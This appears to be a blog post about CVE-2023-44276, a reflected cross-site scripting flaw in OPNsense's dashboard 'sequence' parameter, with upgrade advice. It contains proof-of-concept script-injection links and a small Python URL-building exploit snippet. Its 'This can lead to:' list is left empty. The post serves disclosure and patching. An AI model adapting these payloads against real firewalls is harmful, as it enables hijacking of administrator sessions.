If you are running OPNsense firewall before version 23.7.5, this post is for you. In late 2023, a serious vulnerability—CVE-2023-44276—was found that can let an attacker inject malicious JavaScript on your OPNsense Lobby Dashboard. This means somebody with network access can hijack your session or execute actions as you, just by getting you to click the wrong link.

Let's break down what this issue is about, how an attacker could use it, and how you can fix it.

What is OPNsense?

OPNsense is a powerful and popular open-source firewall and routing OS, widely used in both home and enterprise environments. Its web interface (Dashboard) is what many users interact with to configure the system.

What is CVE-2023-44276?

This CVE identifies a Cross-Site Scripting (XSS) vulnerability on OPNsense's web interface, specifically before version 23.7.5.

Type: Reflected XSS

An attacker can exploit this by tricking someone with OPNsense administrator access (maybe you!) into clicking a crafted link.

Why Does It Matter?

Any user with dashboard access who clicks a link containing a malicious sequence parameter can have JavaScript run in their browser session. This can lead to:

A URL like this is what the attacker would send you

https://your-opnsense-firewall.local/index.php?sequence=malicious

In vulnerable versions, if sequence contains script code, it can get executed in your browser.

Demonstration: Proof-of-Concept XSS Payload

Here’s a simple proof-of-concept payload. Imagine an attacker sends you this link (maybe in your email or a chat message):

https://opnsense-firewall.local/index.php?sequence=%3Cscript%3Ealert('XSS!')%3C%2Fscript%3E

When you, as an authenticated user, click this, a popup will appear with "XSS!" That shows that arbitrary JavaScript can be injected.

For the curious, %3Cscript%3Ealert('XSS!')%3C%2Fscript%3E is just a URL-encoded version of <script>alert('XSS!')</script>.

Decoded Example

<script>alert('XSS!')</script>

Exploit Code Snippet

Here’s how an attacker might craft the attack in Python, automatically sending embedded JavaScript via a link.

import urllib.parse

base_url = "https://opnsense-firewall.local/index.php";
payload = "<script>alert(document.domain)</script>"

# Encode the payload for URL transmission
encoded_payload = urllib.parse.quote(payload)

exploit_url = f"{base_url}?sequence={encoded_payload}"
print("Malicious URL:", exploit_url)

When the victim admin clicks this link and is authenticated, the script runs with their privileges.

Original References

- NVD: CVE-2023-44276 Details
- OPNsense GitHub Commit Fix
- OPNsense Advisory

Responsible Disclosure and Fix

This bug was fixed quickly in version 23.7.5 of OPNsense. The fix is simple: the code now sanitizes the sequence parameter instead of outputting it directly.

Upgrading is critical. If you are running any OPNsense version prior to 23.7.5, you are at risk.

Check your OPNsense version.

Go to the web dashboard and look for the version in the footer. If it's *before* 23.7.5, you must update.

Educate users.

Never click unsolicited or suspicious OPNsense dashboard links—especially if you’re logged in as admin.

Summary

- CVE-2023-44276 allows attackers to inject JavaScript on OPNsense lobby dashboard pre-23.7.5 through a crafted sequence parameter.

Upgrading to OPNsense 23.7.5 or newer fixes the problem.

Stay safe, patch often, and remember: Even the best firewalls can fall to a naughty URL!


Need more information?
Check out the official OPNsense CVE-2023-44276 advisory or this GitHub diff showing how the bug was fixed.

If you found this post helpful, tell your sysadmin friends—they’ll thank you!


*Written exclusively for those who want to keep their networks safe from the latest threats. Always update and stay alert!*

Timeline

Published on: 09/28/2023 05:15:00 UTC
Last modified on: 10/02/2023 19:04:00 UTC